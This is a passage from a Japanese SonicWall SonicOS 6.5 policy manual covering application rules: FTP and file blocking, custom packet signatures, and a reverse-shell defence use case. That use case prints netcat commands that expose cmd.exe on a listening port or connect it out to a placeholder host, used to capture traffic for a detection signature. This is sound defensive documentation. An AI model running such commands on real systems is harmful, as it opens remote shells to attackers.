致オブジェク ト を示しています。 この一致オブジェク ト を使用するポリシーを作成することで、 オンライン ゲームやその他の Shockwave ベースのコンテンツを遮断できます。

ActiveX の一致オブジェク ト

これらの ActiveX コン ト ロールのクラス ID は、 インターネッ ト上で参照できます。 また、 ブラウザに

ソースを表示して調べることもできます。 例えば、 クラス ID が含まれるソース フ ァイルの例に示す

ソース ファイルには、 Macromedia Shockwave または Flash のクラス ID が含まれています。

Active X のタイプとクラス ID

ActiveX タイプ クラス ID

Apple Quicktime 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B

Macromedia Flash v6、 v7 D27CDB6E-AE6D-11cf-96B8-444553540000

Macromedia Shockwave D27CDB6E-AE6D-11cf-96B8-444553540000

Microsoft Windows Media Player v6.4 22d6f312-b0f6-11d0-94ab-0080c74c7e95

Microsoft Windows Media Player v7~10 6BF52A52-394A-11d3-B153-00C04F79FAA6

Real Networks Real Player CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA

Sun Java Web Start 5852F5ED-8BF4-11D4-A245-0080C6F74284

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定63

クラス ID が含まれるソース ファイルの例

FTP 制御アプリケーシ ョ ン ルールは、 FTP コマンド とフ ァイル内容一致オブジェク ト タイプを使用して、 FTPの制御チャンネル、 FTP アップロード とダウンロードに対する制御を提供します。 これらを使用する

ことで、 FTP の使用を効果的に制限できます。 このセクシ ョ ンでは、 以下の 2 つの使用事例を紹介し

ます。

• 機密ファイルの FTP 送信の遮断 (64 ページ)

• 送信 UTF-8/UTF-16 エンコード ファイルの遮断 (66 ページ)

• FTP コマンドの遮断 (68 ページ)

機密ファイルの FTP 送信の遮断

例えば、 FTP による機密ファイルの送信を遮断するには、 ファイル内のキーワードまたはパターンに

基づいてポリシーを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定64

送信機密ファイルを遮断するには、 以下の手順に従います。

1 ファイル内のキーワードに一致するファイル内容タイプの一致オブジェク ト を作成します。

必要に応じて、 メ ッセージをクライアン トに送信する、 カスタマイズされた FTP 通知動作を作

成します。

2 この一致オブジェク ト と動作を参照するポリシーを作成します。 ファイル転送を遮断して接続をリセッ トするこ とだけを目的とする場合は、 ポリシーを作成するときにリセッ ト /破棄動作

を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定65

送信 UTF-8/UTF-16 エンコード ファイルの遮断

アプリケーシ ョ ン ルールによる Unicode UTF-8 および UTF-16 のネイテ ィブ サポートにより、 漢字やか

な文字など、 エンコード されたマルチバイ ト文字を英数字入力によって一致オブジェク トのコンテンツ キーワード と して入力するこ とができます。 アプリケーシ ョ ン ルールは、 ウェブ ページや電子

メール アプリケーシ ョ ンに通常見られる UTF-8 エンコード コンテンツや、 Windows OS/Microsoft オフ ィス ベースのドキュ メン トに通常見られる UTF-16 エンコード コンテンツのキーワード マッチング

をサポート しています。

独自 Unicode ファイルの送信ファイル転送の遮断は、 他の機密ファイル転送の遮断と同じように処理

されます。

1 ファイル内の UTF-8 または UTF-16 でエンコード されたキーワードに一致する一致オブジェク ト

を作成します。

2 この一致オブジェク ト を参照して一致するファイルの転送を遮断するポリシーを作成します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定66

次の例では、 ファイル内容一致オブジェク ト種別に対し、 "機密文書" を意味する、 UTF-16 でエ

ンコード された中国語のキーワードを使用しています。

3 以下に示すよ うに、 この一致オブジェ ク ト を参照するポリシーを作成します。 このポリシーは、 ファイル転送を遮断し、 接続をリセッ ト します。 「ログを有効にする」 を選択しているのは、 UTF-16 でエンコード されたキーワードを含むファイルを転送しよう とする試みをログに残

すためです。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定67

接続のリセッ ト /破棄の後には、 ログ エン ト リが生成されます。 以下に示すログ エン ト リの例には、

アプ リケーシ ョ ン制御の警告であるこ と を示すメ ッセージのほか、 ポリ シー名と リセ ッ ト /破棄

(Reset/Drop) という動作種別が表示されています。

FTP コマンドの遮断

アプリケーシ ョ ン ルールを使用して、 put、 mput、 rename_to、 rename_from、 rmdir、 mkdir などのコ

マン ド を遮断するこ とにより、 FTP サーバを読み取り専用に設定できます。 この使用事例では、 putコマンドのみを含んだ一致オブジェク ト を示しますが、 これらすべてのコマンドを同じ一致オブジェク トに含めることができます。

FTP コマンドを遮断するには、 以下の手順に従います。

1 put コマンドに一致する一致オブジェク ト を作成します。 mput コマンドは put コマンドの変種

なので、 put コマンドに一致する一致オブジェク トは mput コマンドにも一致します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定68

2 必要に応じて、 メ ッセージをクライアン トに送信する、 カスタマイズされた FTP 通知動作を作

成することができます (以下の例を参照)。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定69

3 この一致オブジェク ト と動作を参照するポリシーを作成します。 put コマンドを遮断して接続を

リセッ トするこ とだけを目的とする場合は、 ポリシーを作成するときにリセッ ト /破棄動作を

選択します。

帯域幅管理アプリケーシ ョ ン層帯域幅管理を使用すると、 特定の種類のフ ァイルを転送するために使用できるネッ トワーク帯域幅を制御できます。 これにより、 ネッ トワーク上の非生産的なト ラフ ィ ッ クを抑制し、 生産的なト ラフ ィ ックを奨励できます。

例えば、 FTP 上で MP3 ファイルをダウンロードするために使用される帯域幅を 400 Kbps 以下に制限す

るこ とが可能です。 MP3 フ ァ イルをダウンロード しているユーザが 1 人であっても 100 人であって

も、 このポリシーによって合計帯域幅が 400 Kbps に制限されます。

帯域幅管理の設定については、 『SonicOS セキュ リテ ィ設定』 技術ドキュ メン トの 「フ ァイアウォー

ル設定 > 帯域幅管理」 を参照して ください。

DPI を迂回するアクセスされるコンテンツが安全であることがわかっている場合、 「DPI をバイパスする」 動作を作

成すると、 ネッ トワークのパフォーマンスを向上させるこ とができます。 例えば、 従業員がウェブ

サーバ上の URL にアクセスするこ とで、 HTTP 経由でス ト リーム配信される社内向けのビデオがこの

ケースに該当します。 コンテンツは安全であることがわかっているため、 このビデオへのすべてのア

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定70

クセスに 「DPI をバイパスする」 動作を適用するアプリケーシ ョ ン ルールポリシーを作成できます。

これにより、 ビデオにアクセスする従業員向けに、 高速なス ト リーミング速度と優れた表示品質を実現できます。

このポリシーは次の 2 つの手順で作成できます。

1 「HTTP URI コンテンツ」 という一致オブジェク ト種別を使用して、 社内向けビデオ用の一致オ

ブジェク ト を定義します。

2 Corporate Video 一致オブジェク ト と 「DPI をバイパス」 動作を使用するポリシーを作成します。

ヒン ト : URI コンテンツ一致オブジェク トの完全一致タイプおよび前方一致タイプには、

必ず URL の先頭のスラッシュ (/) を含める必要があります。 「内容」 フ ィールドに www.company.com などのホスト ヘッダーを含める必要はありません。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定71

個別のシグネチャアプリケーシ ョ ン ルールに定義済みのオブジェ ク トのタイプが用意されていないト ラフ ィ ッ クを制

御する場合は、 パケッ トの任意の部分に一致する個別一致オブジェ ク ト を作成できます。 これにより、 任意のネッ トワーク プロ ト コルに対して個別のシグネチャを作成できます。

例えば、 HTTP GET 要求のパケッ ト に一致する個別のシグネチャを作成できます。 ローカル エリア

ネッ トワークからのウェブ閲覧を防ぐためにこれを使用することもあります。

HTTP GET パケッ トの一意な識別子を調べるには、 Wireshark ネッ トワーク プロ ト コル アナライザを使

用してパケッ ト ヘッダーをチェ ッ ク します。 Wireshark の使用法の詳細については、 Wireshark (46ページ) を参照して ください。 Wireshark では、 関心のある ト ラフ ィ ッ クが含まれるい くつかのパケッ

ト をキャプチャ します。 この例では、 HTTP GET 要求パケッ ト をキャプチャすると します。 任意の

ウェブ ブラウザを使用して HTTP GET 要求を生成できます。 Wireshark に表示された HTTP GET 要求パ

ケッ トに、 Wireshark で HTTP GET 要求パケッ ト を表示した画面を示します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定72

Wireshark に表示された HTTP GET 要求パケッ ト

ネッ トワーク プロ ト コルに対して個別のシグネチャを作成するには:

1 Wireshark の上部ペインで下にスクロールして HTTP GET パケッ ト を探します。

2 その行を選択します。

下部の 2 つのペインに対象のパケッ トが表示されます。 中央ペインには SYN パケッ トのパケッ

ト ヘッダーが人間が読み取れる形式で表示されます。 実際のヘッダー バイ トは、 16 進形式で

下部のペインに表示されます。

3 中央ペインで、 「Hypertext Transfer Protocol」 セクシ ョ ンを展開してパケッ ト ペイロードを表

示します。

4 アプリケーシ ョ ン ルールで参照する識別子を見つけます。 この例では、 目的の識別子は 初の

3 バイ トに含まれる GET コマンドです。

5 この識別子を選択して、 下部ペイン内の対応するバイ ト を強調表示します。

6 下部ペイン内で強調表示されたバイ トのオフセッ ト と深度を調べることができます。

• オフセッ トは、 パケッ ト内で照合を開始するバイ ト を示します。

• 深度は、 照合を終了する 後のバイ ト を示します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定73

オフセッ ト を使用することで、 非常に限定的な照合を行い、 誤検出を 小限にすることができます。 オフセッ ト と深度の計算には、 16 進数ではな く 10 進数を使用します。

個別一致オブジェク トに関連付けられるオフセッ ト と深度は、 パケッ ト ペイロード (TCP または

UDP ペイロードの開始位置) を起点として計算されます。 この例では、 オフセッ トが 1 (10 進)、 深

度が 3 です。

7 この情報を使用する個別一致オブジェク ト を作成します。

8 「一致オブジェク トの設定」 ダイアログで、 オブジェク トに対するわかりやすい名前を 「オブジェク ト名」 フ ィールドに入力します。

9 「一致オブジェク ト種別」 ドロップダウン メニューから 「個別オブジェク ト」 を選択します。

10 「設定を有効にする」 チェ ッ クボックスをオンにします。

11 「オフセッ ト 」 フ ィールドに、 「1」 (識別子の開始バイ ト ) と入力します。

12 「深度」 テキスト ボックスに、 「3」 (識別子の終了バイ ト ) と入力します。

13 「ペイロード サイズ」 は既定値のままにしておきます。 「ペイロード サイズ」 はパケッ ト内の

データの量を示すために使用しますが、 ここではパケッ ト ヘッダーだけに注目します。

14 「入力形式」 で、 「16 進数」 を選択します。

15 「内容」 テキスト ボックスに、 Wireshark に表示されたバイ ト数 「474554」 を入力します。 16進コンテンツ内ではスペースを使用しないで く ださい。

メモ : オフセッ ト と深度を計算するときは、 パケッ ト内の 初のバイ トが (0 ではな く ) 1と してカウン ト されます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定74

16 この一致オブジェク トはアプリケーシ ョ ン ルール ポリシーで使用します。

a 「アプリケーシ ョ ン制御ポリシーの設定」 ダイアログで、 わかりやすいポリシー名を入力します。

b ポリシー種別で 「HTTP クライアン ト要求」 を選択します。

c 「一致オブジェク ト」 ドロップダウン メニューで、 定義した一致オブジェク ト を選択し

ます。

d 個別動作または 「リセッ ト /破棄」 などの既定動作を選択します。

e 「接続側」 で、 「クライアン ト側」 を選択します。

f 他の設定についても変更できます。 ポリシーの作成の詳細については、 アプリケーシ ョンルールポリシーの設定 (42 ページ) を参照して ください。

リバース シェル悪用の防御アプリケーシ ョ ン ルールの個別のシグネチャ機能 (個別のシグネチャ (72 ページ) を参照) を使用する

と、 リバース シェル悪用攻撃を防ぐこ とができます。 リバース シェル悪用は、 攻撃者がゼロデイ

(Zero-day) 悪用によってシステムへの侵入に成功した場合に使用される可能性があります。 ゼロデイ

悪用とは、 そのシグネチャがまだセキュリテ ィ ソフ トウェアで認識されない攻撃のことです。

まだ知られていない初期の段階では、 悪意のあるペイロードは防御の 前線、 つまりインターネッ ト

ゲートウェイで実行されている IPS やゲートウェイ アンチウイルス (GAV) を通過できます。 さらに、

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定75

ホス トベースのアンチウイルス ソフ トウェアなど、 その次の防御線まで通過して、 攻撃対象のシス

テムで任意のコードを実行できます。

多くの場合、 実行されるコードには、 攻撃者がリモートから (悪用するサービスやログオン ユーザの

権限を使用して) コマンド プロンプ ト ウィンドウを開き、 そこから侵入に着手するために必要な 小

限の命令が含まれています。

NAT/ファイアウォールがあると、 悪用するシステムに能動的に接続できないことがあるので、 それら

を迂回する一般的な手段と して、 攻撃者は脆弱なシステムにリバース シェルを実行させます。 リ

バース シェルでは、 攻撃対象のホス トから攻撃者のア ド レスに対して接続が開始されます。 しか

も、 厳格な送信ポリシーをうま く回避するために、 既知の TCP/UDP ポートが使用されます。

この使用事例は、 Windows システムをホスト している環境で、 すべての TCP/UDP ポート を介した暗号

化されていない接続をインターセプ トする場合に適用できます。

この使用事例では、 リバース シェル ペイロードの特定の事例 (送信接続) を扱っていますが、 受信接

続に対しても有効になるようにポリシーを設定すると安全性が向上します。 これにより、 実行されたペイロー ドが脆弱なホス ト にリ スニング シ ェルを生成し、 攻撃者が誤って設定されたフ ァ イア

ウォール経由でそのサービスに接続するような事例を防ぐことができます。

実際の設定では、 次の作業を行う必要があります。

• netcat ツールを使用して、 特徴を検出する実際のネッ トワーク活動を生成する

• Wireshark ツールを使用して活動をキャプチャし、 ペイロードをテキスト ファイルにエクスポー

トする

• 誤検出を防げるだけの適度に具体的で一意な文字列を使用して、 一致オブジェク ト を作成する

• そのオブジェク ト を含むペイロードが解析されたときに実行する動作を指定したポリシーを定義する (ここでは、 既定のリセッ ト /破棄を使用)

ト ピッ ク :

• ネッ トワーク アクテ ィ ビテ ィの生成 (76 ページ)

• Wireshark を使用したペイロードのキャプチャおよびテキスト ファイルへのエクスポート (77 ページ)

• 一致オブジェク トの作成 (77 ページ)

• ポリシーの定義 (78 ページ)

ネッ トワーク アクテ ィ ビテ ィの生成

netcat ツールが備える多くの機能の 1 つに、 プログラムの出力を送信接続またはリスニング接続にバ

イン ドする機能があります。 次の使用例は、 リスニング“コマン ド プロンプ ト デーモン"を設定する

方法、 またはリモート エン ドポイン トに接続して、 対話型のコマンド プロンプ ト を提供する方法を

示しています。

• nc -l -p 23 -e cmd.exe

ポート 23 に接続するホストから Windows プロンプ ト を利用できるようになります (-l オプシ ョ

ンは、 既定の暗黙的な接続モード とは逆のリスン モードを表しています)。

• nc -e cmd.exe 44.44.44.44 23

メモ : 暗号化されていない Telnet サービスを使用しているネッ トワークでは、 それらのサーバ

の IP アドレスを除外するポリシーを設定する必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定76

ホス ト 44.44.44.44 が次の netcat コマンドを使用してポート 23 でリスンしている場合に、 ホス

ト 44.44.44.44 から Windows プロンプ ト を利用できるようになります。

nc -l ー p 23

Wireshark を使用したペイロードのキャプチャおよびテキス

ト ファイルへのエクスポート

データをキャプチャするには、 Wireshark を起動し、 「Capture > Interfaces」 を選択してキャプチャ ダイアログを開きます。 netcat ト ラフ ィ ッ クを処理するインターフェースでキャプチャを開始します。

キャプチャを開始したらすぐに netcat コマンドを実行し、 キャプチャを終了します。

Wireshark に表示されたネッ トワーク上のデータ フローは、 そのよ うな接続時のネッ トワーク上の

データ フローを示しています (Vista Enterprise、 2007 年 6 月)。

Wireshark に表示されたネッ トワーク上のデータ フロー

16 進データをテキス ト ファイルにエクスポート し、 パケッ ト ヘッダー、 不必要な部分や変化する部

分およびスペースを取り除きます。 ここで関係があるのは Microsoft… reserved の部分です。 こ

れには Wireshark の 16 進ペイ ロー ド エ ク スポー ト 機能を使用し ます。 Wireshark については、

Wireshark (46 ページ) を参照して ください。

一致オブジェク トの作成Vista のコマンド プロンプ ト バナーを表す一致オブジェク トのオブジェク ト内容として、 次の 16 進文

字を入力します。

4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E363030305D0D0A436F70797269676874202863292032303036204D6963726F73667420436F72706F726174696F6E2E

同じ方法で Windows 2000 および Windows XP のホストからも類似のエン ト リを取得し、 それらを使用

して別の一致オブジェク ト を作成します。 次に示すような 3 つの一致オブジェク トが作成されます。

メモ : 特徴のエクスポート と一致オブジェク トの定義に、 実際には 16 進表記を使用する必要は

ありません (この例の実際のシグネチャは ASCII テキストです)。 16 進数はバイナリのシグネチャ

の場合にのみ必要です。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定77

Windows Server 2003 やその他のバージ ョ ンの Windows の例も、 ここで説明した方法で簡単に取得で

きます。

Linux/UNIX の管理者は、 このシグネチャ ベースの防御を利用するために、 既定の環境変数をカスタマ

イズする必要があります。 通常、 既定のプロンプ トは、 前述のように使用できるほど具体的でも一意でもありません。

ポリシーの定義一致オブジェク ト を作成したら、 そのオブジェク ト を使用するポリシーを定義します。 次の図は、 他のポリシーの設定を示しています。 この例の 「ポリシー名」 と 「方向」 の設定は、 リバース シェル

専用になっています。 前述のように、 「方向」 の設定を 「両方」 に変更し、 より汎用的な名前を付けることで、 適用範囲を広げることもできます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定78

接続のリセッ ト /破棄後に、 ネッ トワーク アクセスの種別を示すログ エン ト リが生成されます。 接続

のリセッ ト /破棄の後のログ エン ト リに示すログ エン ト リには、 アプリケーシ ョ ン制御の警告である

ことを示すメ ッセージのほか、 ポリシー名が表示されています。

接続のリセッ ト /破棄の後のログ エン ト リ

経験則として、 適切なセキュリテ ィ対策には多層のインテリジェンスが組み込まれており、 ある 1 つの方法だけを悪意のあるコードに対する決定的な防御と見なすことはできません。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン ルール ポリシーの設定79

3

アプリケーシ ョ ン制御の設定

• 「ルール アプリケーシ ョ ン 制御」 (80 ページ)

• アプリケーシ ョ ン制御ポリシーの作成について (82 ページ)

• アプリケーシ ョ ン制御の状況の表示 (83 ページ)

• アプリケーシ ョ ン制御のグローバル設定について (83 ページ)

• シグネチャの表示 (84 ページ)

• アプリケーシ ョ ン制御のグローバル設定の構成 (90 ページ)

• アプリケーシ ョ ン制御の種別ごとの設定 (95 ページ)

• アプリケーシ ョ ン制御のアプリケーシ ョ ンごとの設定 (97 ページ)

• シグネチャによるアプリケーシ ョ ン制御の設定 (99 ページ)

「ルール アプリケーシ ョ ン 制御」

メモ : アプリケーシ ョ ン制御はライセンスされたサービスであり、 この機能を使用するには該当するサービスを有効にする必要があります。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定80

「ルール > アプリケーシ ョ ン制御」 ページでは、 種別、 アプリケーシ ョ ン、 シグネチャを使用してグ

ローバルなアプリケーシ ョ ン制御ポリシーを設定できます。 アプリケーシ ョ ンのある種別全体の遮断とログ記録を迅速に有効化したり、 個々のアプリケーシ ョ ンや個々のシグネチャを容易に特定して同じ処理を実行したりできます。 有効化すると、 「ルール > アプリケーシ ョ ン ルール」 ページでポリ

シーを作成しな く ても、 種別、 アプリケーシ ョ ン、 またはシグネチャのグローバルな遮断またはログ記録が行われます。 すべてのアプリケーシ ョ ン検出および防御の設定は 「ルール > アプリケーシ ョ ン

制御」 ページで利用できます。

このページでは次の設定を使用できます。

• 種別、 アプリケーシ ョ ン、 またはシグネチャを選択する。

• 遮断またはログ記録、 あるいはこれら両方の動作を選択する。

• 動作に含めたり除外したりするユーザ、 グループ、 または IP アドレス範囲を指定する。

• 制御を執行するスケジュールを設定する。

これらのアプリケーシ ョ ン制御設定はアプリケーシ ョ ン ルール ポリシーとは独立したものですが、

ここで使用できる任意の種別、 アプリケーシ ョ ン、 またはシグネチャでアプリケーシ ョ ン一致オブジェ ク ト を作成して、 それらの一致オブジェ ク ト をアプリケーシ ョ ン ルール ポリシーで使用するこ

ともできます。 詳細については、 アプリケーシ ョ ン リス ト オブジェ ク トについて (161 ページ) およ

びアプリケーシ ョ ンリス トオブジェク トの設定 (165 ページ) を参照して ください。

ビデオ : アプリケーシ ョ ン制御の設定例を示す情報ビデオがオンラインで提供されています。https://www.sonicwall.com/support/video-tutorials

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定81

ト ピッ ク :

• アプリケーシ ョ ン制御ポリシーの作成について (82 ページ)

• アプリケーシ ョ ン制御の状況の表示 (83 ページ)

• アプリケーシ ョ ン制御のグローバル設定について (83 ページ)

• シグネチャの表示 (84 ページ)

• アプリケーシ ョ ン制御のグローバル設定の構成 (90 ページ)

• アプリケーシ ョ ン制御の種別ごとの設定 (95 ページ)

• アプリケーシ ョ ン制御のアプリケーシ ョ ンごとの設定 (97 ページ)

• シグネチャによるアプリケーシ ョ ン制御の設定 (99 ページ)

アプリケーシ ョ ン制御ポリシーの作成について 「ルール > アプリケーシ ョ ン制御」 ページの設定手法では、 特定の種別、 アプリケーシ ョ ン、 または

シグネチャをきめ細かく制御できます。 これには、 きめ細かなログ制御や、 ユーザ、 グループ、 または IP アドレス範囲の包含および除外、 スケジュールのきめ細かな設定が含まれます。 ここでの設定

はグローバルなポリシーであり、 どんな個別のアプリケーシ ョ ン ルール ポリシーからも独立してい

ます。

このページでは次の設定を使用できます。

• 種別、 アプリケーシ ョ ン、 またはシグネチャを選択する。

• 遮断またはログ記録、 あるいはこれら両方の動作を選択する。

• 動作に含めたり除外したりするユーザ、 グループ、 または IP アドレス範囲を指定する。

• 制御を執行するスケジュールを設定する。

これらのアプリケーシ ョ ン制御設定はアプリケーシ ョ ン ルール ポリシーとは独立したものですが、

ここの場所または 「オブジェク ト > 一致オブジェク ト」 ページで使用できる任意の種別、 アプリケー

シ ョ ン、 またはシグネチャでアプリケーシ ョ ン一致オブジェク ト を作成して、 それらの一致オブジェク ト をアプリケーシ ョ ン ルール ポリシーで使用することもできます。 これにより、 アプリケーシ ョ

ン ルールで設定できる動作やその他の多様な設定を使用できます。 アプリケーシ ョ ン ルールに関す

るこ う したポリシーベースのユーザ インターフ ェースの詳細については、 アプリケーシ ョ ン リス ト

オブジェク トについて (161 ページ) を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定82

アプリケーシ ョ ン制御の状況の表示アプリケーシ ョ ン制御の状況の情報は、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページに表示

されます。

「アプリケーシ ョ ン制御の状況」 セクシ ョ ンは、 シグネチャ データベースに関する情報を表示し、

データベースを更新できます。

ゾーンごとにアプリケーシ ョ ン制御を有効にするには、 「アプリケーシ ョ ン制御の状況」 セクシ ョ ンの 「ネッ トワーク >ゾーン」 ページへのリンクをクリ ッ クします。

アプリケーシ ョ ン制御のグローバル設定について

「ルール > アプリケーシ ョ ン制御 l」 ページには、 次のグローバル設定が含まれています。

• アプリケーシ ョ ン制御を有効にする - アプリケーシ ョ ン制御はライセンスされたサービスであ

り、 この機能を有効にする必要があります。 「ネッ トワーク > ゾーン」 ページからゾーンごと

に有効にする必要があります。

アプリケーシ ョ ン シグネチャ データベース

アプリケーシ ョ ン シグネチャ データベースがダウンロード済み

かどうかを示します。

アプリケーシ ョ ン シグネチャ データベース タイムスタンプ

アプリケーシ ョ ン シグネチャ データベースがダウンロード され

た UTC 日時を表示します。

アプ リケーシ ョ ン シグネチャ データベースを更新するには、

「更新」 ボタンを選択します。

終確認 SonicOS がアプリケーシ ョ ン シグネチャ データベースの更新の

有無をチェ ックした 終日時を表示します。

アプリケーシ ョ ン シグネチャ データベースの有効期限

アプリケーシ ョ ン シグネチャ データベースの有効期限が切れる

日を表示します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定83

• すべてのアプリケーションをログする - 有効にすると、 アプリケーショ ン制御とアプリケーショ

ン ルールのポリシーの一致と処理が記録されます。

• グローバル ログ冗長フ ィルタ間隔 - 同じポリシー一致の複数の発生が繰り返し記録され

ない間隔 (秒単位)。 範囲は 0~99999 秒で、 既定値は 60 秒です。

グローバル ログ冗長設定は、 すべてのアプリケーシ ョ ン制御のイベン トに適用されま

す。 ゼロに設定した場合、 通過ト ラフ ィ ッ ク内で検知されたポリシーの一致ごとに 1 つのログ エン ト リが作成されます。 その他の値は、 同じポリシーでの一致に対するログ

エン ト リ間の 小秒数を指定します。 例えば、 ログ冗長設定と して 10 を指定した場

合、 それぞれのポリシーの一致に対して 10 秒ごとに 1 つのメ ッセージが作成されます。

ログの冗長性も設定できます。

• 「アプリケーシ ョ ン制御ポリシーの編集」 ダイアログで、 ポリシーごとに設定します。

• 「アプリケーシ ョ ン制御種別の編集」 ダイアログで、 種別ごとに設定します。

• 「アプ リケーシ ョ ン制御アプリケーシ ョ ンの編集」 ダイアログで、 アプ リケーシ ョ ンごとに設定します。

それぞれのポリシー設定に対して行われるポリシー単位のログ冗長フ ィルタ設定は、 グローバル ログ冗長フ ィルタ設定よりも優先されます。

• アプリケーシ ョ ン制御の設定 - アプリケーシ ョ ン制御除外リス ト を有効にする方法を提供し

ます。

• アプリケーシ ョ ン制御の設定とポリシーをリセッ ト - すべてのアプリケーシ ョ ン制御の設定と

ポリシーを工場出荷時の既定値にリセ ッ ト しますが、 初に警告ダイアログが表示され、「OK」 または 「 キャンセル」 を選択する必要があります。

シグネチャの表示

「アプリケーシ ョ ン制御詳細」 の表示を各種の 「表示形式」 で変更できます。

表示形式 オプシ ョ ン 表示対象

種別 すべて (既定) すべての種別とそのシグネチャ アプリケーシ ョ ン

個々の種別 指定した種別のシグネチャ アプリケーシ ョ ン

アプリケーシ ョ ン

すべて (既定) 指定した種別に関連付けられているすべてのシグネチャ アプ

リケーシ ョ ン

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定84

「検索するシグネチャ ID」 フ ィールドに ID を入力して、 特定のシグネチャの 「アプリケーシ ョ ン制

御シグネチャの編集」 ダイアログを表示することもできます。

ト ピッ ク :

• すべての種別とすべてのアプリケーシ ョ ンをアプリケーシ ョ ンごとに表示 (85 ページ)

• すべての種別とすべてのアプリケーシ ョ ンをシグネチャごとに表示 (86 ページ)

• すべての種別とすべてのアプリケーシ ョ ンを種別ごとに表示 (87 ページ)

• 1 つの種別のみ表示 (87 ページ)

• 1 つのアプリケーシ ョ ンのみ表示 (88 ページ)

• シグネチャ アプリケーシ ョ ンの詳細の表示 (88 ページ)

• アプリケーシ ョ ン シグネチャの詳細の表示 (90 ページ)

すべての種別とすべてのアプリケーシ ョ ンをアプリケーシ ョ ンごとに表示

「アプリケーシ ョ ン制御詳細」 テーブルに表示される列の説明については、 すべての種別とすべてのアプリケーシ ョ ンをシグネチャごとに表示 (86 ページ) を参照して ください。

表示方法 シグネチャ 指定した種別に関連付けられているすべてのシグネチャ アプ

リケーシ ョ ンとアプリケーシ ョ ンに関連付けられているシグネチャ

アプリケーシ ョ ン (既定)

指定した種別に関連付けられているすべてのシグネチャ アプ

リケーシ ョ ン

種別 「種別」 表示形式で指定した種別

表示形式 オプシ ョ ン 表示対象

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定85

すべての種別とすべてのアプリケーシ ョ ンをシグネチャごとに表示

種別 選択したシグネチャ種別またはすべてのシグネチャ種別の名前すべてのシグネチャ アプリケーションは、 同じ種別見出し ( 「APP-UPDATE」 など) でグループ化されます。

アプリケーシ ョ ン

種別内の各シグネチャ アプリケーシ ョ ンの名前。

名前 シグネチャ名。

ID シグネチャ ID。

遮断 種別またはアプリケーシ ョ ンが遮断されているかどうかを示します。 遮断が有効な場合、 この列には有効アイコンが表示されます。 種別の行には 「既定」 という語が表示される場合があります。

ログ 種別またはアプリケーシ ョ ンがログ記録されているかどうかを示します。 ログ記録が有効な場合、 この列には有効アイコンが表示されます。

方向 ト ラフ ィ ッ クの方向:

コ メン ト 種別またはシグネチャ アプリケーシ ョ ンに以下を設定していない場合、 この列は空

白になります。

• ユーザアイコン - ユーザ/グループの包含/除外設定。 • 情報アイコン - IP アドレスの包含/除外設定。 • 時計アイコン - 「常に有効」 以外のスケジュール。

設定 シグネチャ アプリケーシ ョ ンの設定を変更するためのダイアログを表示する編集ア

イコン。

受信 送信 両方

受信、 クライアン ト 送信、 クライアン ト 双方向、 クライアン ト

受信、 サーバ 送信、 サーバ 双方向、 サーバ

受信、 クライアント、 サーバ 送信、 クライアント、 サーバ 双方向、 ク ラ イ ア ント、 サーバ

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定86

すべての種別とすべてのアプリケーションを種別ごとに表示

「アプリケーシ ョ ン制御詳細」 テーブルに表示される列の説明については、 すべての種別とすべてのアプリケーシ ョ ンをシグネチャごとに表示 (86 ページ) を参照して ください。

1 つの種別のみ表示

「アプリケーシ ョ ン制御詳細」 テーブルの表示を 1 つの種別のシグネチャ アプリケーシ ョ ンのみに限

定するには、 以下のいずれかを実行します。

• 「シグネチャ種別」 ドロップダウン メニューから種別を選択します。

• 種別見出し ( 「APP-UPDATE」 など) を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定87

1 つのアプリケーシ ョ ンのみ表示

「アプリケーシ ョ ン制御詳細」 テーブルの表示を 1 つのアプリケーシ ョ ンのシグネチャのみに限定す

るには、 「アプリケーシ ョ ン」 ド ロ ップダウン メニューからアプリケーシ ョ ンを選択します。 「ア

プリケーシ ョ ン制御詳細」 テーブルに表示される列の説明については、 すべての種別とすべてのアプリケーシ ョ ンをシグネチャごとに表示 (86 ページ) を参照して ください。

シグネチャ アプリケーシ ョ ンの詳細の表示 シグネチャ アプリケーシ ョ ンの詳細を表示するには、 シグネチャ アプリケーシ ョ ンの名前を選択し

ます。 「アプリケーシ ョ ンの詳細」 ポップアップ ダイアログが表示されます。

シグネチャ ID

シグネチャ ID。

種別 シグネチャ アプリケーシ ョ ンの種別 (P2P、 GAMING など)。

